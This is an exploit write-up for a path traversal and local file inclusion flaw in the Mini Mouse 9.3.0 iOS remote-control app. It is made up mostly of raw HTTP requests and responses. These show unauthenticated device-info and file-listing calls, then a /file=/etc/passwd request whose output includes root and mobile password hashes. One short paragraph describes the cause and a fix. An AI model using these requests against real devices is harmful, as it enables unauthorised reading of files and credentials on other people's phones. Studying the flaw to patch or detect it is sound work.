Thursday, April 29, 2021

Mini Mouse 9.3.0 - Local File inclusion / Path Traversal

# Exploit Title: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal
# Author: gosh
# Date: 05-04-2021
# Vendor Homepage: http://yodinfo.com 
# Software Link: https://apps.apple.com/us/app/mini-mouse-remote-control/id914250948
# Version: 9.3.0
# Tested on: iPhone; iOS 14.4.2

GET /op=get_device_info HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 0


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1

{
	"ret_code":	1,
	"ret_msg":	"success",
	"data":	{
		"uuid":	"7E07125B-61BE-4F12-820C-FA706C445219",
		"model":	"iPhone",
		"sys_name":	"iOS",
		"sys_version":	"14.4.2",
		"battery_state":	0,
		"battery_level":	-1,
		"memery_total_size":	2983772160,
		"device_name":	"mobile",
		"user_name":	"iPhone",
		"pwd":	"",
		"dir_user":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download",
		"dir_doc":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents",
		"dir_desktop":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Desktop",
		"sys_type":	3
	}
}



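-------------------------------------------------------------------------------------

With an empty request body (no `path` value), get_file_list answers with a listing of the filesystem root: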


POST /op=get_file_list HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 0


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1

{
	"ret_code":	1,
	"ret_msg":	"success",
	"data":	{
		"list":	[{
				"path":	"//usr",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"usr",
				"name_display":	"usr",
				"file_size":	288,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//bin",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"bin",
				"name_display":	"bin",
				"file_size":	128,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//sbin",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"sbin",
				"name_display":	"sbin",
				"file_size":	544,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//.file",
				"is_local":	true,
				"is_hide":	true,
				"is_floder":	false,
				"name":	".file",
				"name_display":	".file",
				"file_size":	0,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//etc",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"etc",
				"name_display":	"etc",
				"file_size":	11,
				"create_time":	1577865.600000,
				"update_time":	1577865.600000,
				"sys_type":	3
			}, {
				"path":	"//System",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"System",
				"name_display":	"System",
				"file_size":	128,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//var",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"var",
				"name_display":	"var",
				"file_size":	11,
				"create_time":	1577865.600000,
				"update_time":	1577865.600000,
				"sys_type":	3
			}, {
				"path":	"//Library",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"Library",
				"name_display":	"Library",
				"file_size":	672,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//private",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"private",
				"name_display":	"private",
				"file_size":	224,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//dev",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"dev",
				"name_display":	"dev",
				"file_size":	1395,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//.ba",
				"is_local":	true,
				"is_hide":	true,
				"is_floder":	true,
				"name":	".ba",
				"name_display":	".ba",
				"file_size":	64,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//.mb",
				"is_local":	true,
				"is_hide":	true,
				"is_floder":	true,
				"name":	".mb",
				"name_display":	".mb",
				"file_size":	64,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//tmp",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"tmp",
				"name_display":	"tmp",
				"file_size":	15,
				"create_time":	1577865.600000,
				"update_time":	1577865.600000,
				"sys_type":	3
			}, {
				"path":	"//Applications",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"Applications",
				"name_display":	"Applications",
				"file_size":	3296,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//Developer",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"Developer",
				"name_display":	"Developer",
				"file_size":	64,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}, {
				"path":	"//cores",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"cores",
				"name_display":	"cores",
				"file_size":	64,
				"create_time":	0,
				"update_time":	0,
				"sys_type":	3
			}]
	}
}

-------------------------
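Using the container path disclosed in the `dir_user` field of the get_device_info response (shown below), the next request asks get_file_list for its parent Documents directory: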
/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download

POST /op=get_file_list HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 101

{"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/"}


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1

{
	"ret_code":	1,
	"ret_msg":	"success",
	"data":	{
		"list":	[{
				"path":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//GDT",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"GDT",
				"name_display":	"GDT",
				"file_size":	96,
				"create_time":	1617228.400302,
				"update_time":	1617228.400302,
				"sys_type":	3
			}, {
				"path":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//input_photo.jpg",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	false,
				"name":	"input_photo.jpg",
				"name_display":	"input_photo.jpg",
				"file_size":	6141491,
				"create_time":	1617583.738397,
				"update_time":	1617583.738402,
				"sys_type":	3
			}, {
				"path":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Ico",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"Ico",
				"name_display":	"Ico",
				"file_size":	64,
				"create_time":	1617583.334913,
				"update_time":	1617583.334913,
				"sys_type":	3
			}, {
				"path":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Download",
				"is_local":	true,
				"is_hide":	false,
				"is_floder":	true,
				"name":	"Download",
				"name_display":	"Download",
				"file_size":	64,
				"create_time":	1617228.371587,
				"update_time":	1617228.371587,
				"sys_type":	3
			}]
	}
}

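----------------------------------------------------------------------

The `file=` handler returns the contents of an absolute path outside the app's own container (here /etc/passwd). None of the requests captured on this page carries a credential, so the listing and read operations appear to be available to any host that can reach port 8039 on the device. A fix would need to authenticate the caller and, after canonicalizing the requested path, confine it to the directory the app intends to share.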

GET /file=/etc/passwd HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 4

{}


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/octet-stream
Content-Range: bytes 0-0/2018
Content-Length : 2018

##
# User Database
# 
# This file is the authoritative user database.
##

nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false
_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false
_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false
_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false
_ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false
_findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false
_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false
_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false
_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false
_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false
_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false
_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false
_diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false
_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false
_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false
_fud:*:278:278:Firmware Update Daemon:/var/db/fud:/usr/bin/false
_knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false
_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false
            
 
